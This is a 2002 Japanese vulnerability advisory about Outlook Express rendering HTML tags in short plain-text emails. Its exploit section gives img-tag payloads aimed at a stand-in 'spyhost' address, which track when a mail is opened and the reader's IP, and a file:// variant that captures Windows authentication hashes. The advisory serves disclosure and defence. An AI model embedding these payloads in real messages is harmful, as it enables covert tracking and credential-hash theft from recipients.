Title:

Microsoft Outlook Express の Content-Type: text/plain; メールにおける WebBug 問題

Date:

21 October 2002 (Last modified: )

Author:

Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]
penetration technique research site [Advisories]

Risk:

Low

Vulnerable:

Microsoft Outlook Express

Overview:

Microsoft Outlook Express には、Content-Type: text/plain; のメールであっても本文が64バイト以内であれば img タグを使うことで WebBug を引き起こせてしまう問題があります。

* WebBugについては以下のURLを参照してください。[リンク先:情報・通信事典 e-Words]
 http://e-words.jp/e.x?w=WebE38390E382B0

Details:

この問題は Outlook Express が Content-Type に従わずにタグを有効にしてしまうことが原因といえます。

たとえメールが Content-Type: text/plain; であったとしても、本文が64バイト以内であれば<img> <a> <head> などの一部のタグは有効になってしまいます。

この問題を img タグを使って悪用されると、ユーザーがメールを開封した時刻やユーザーのIPアドレスを悪意のあるユーザーに知られてしまいます。また img タグの src 属性で file スキームを指定することで、ユーザーのWindows認証のハッシュを悪意のあるユーザーに採取されてしまう危険性があります。

Exploit code:

[ 開封時間やIPアドレスの取得 ]
メールの本文が64バイトを超えないように <img src="http://spyhost/spy.jpg" width=0 height=0> を埋め込む。
(例) <img src="http://192.168.1.1/spy.jpg" width=0 height=0>

[ Windows認証のハッシュの採取 ]
メールの本文が64バイトを超えないように <img src="file://spyhost/spy.jpg"> を埋め込む。
(例) <img src="file://192.168.1.1/spy.jpg" width=0 height=0> 

Related Files:

WebBug.zip [ZIP]

Workaround:

Microsoft Internet Explorer Service Pack 1 をインストールすると Outlook Express に追加される「メッセージはすべてテキスト形式で読み取る」という設定をチェックすることでタグを無効にできます。

 

 

Vendor status:

MSRCには同様の問題である Outlook Express 5.5 が Content-Type: text/plain; のメールに書かれている Script を実行してしまう脆弱性 を2001年11月に報告しましたが、未だに修正されていません。

Related vulnerabilities:

Outlook Express 5.5 が Content-Type: text/plain; のメールに書かれている Script を実行してしまう脆弱性

Microsoft Outlook Express 6 Plain Text Message Script Execution Vulnerability

 Copyright(c) 2002 Eiji James Yoshida. All rights reserved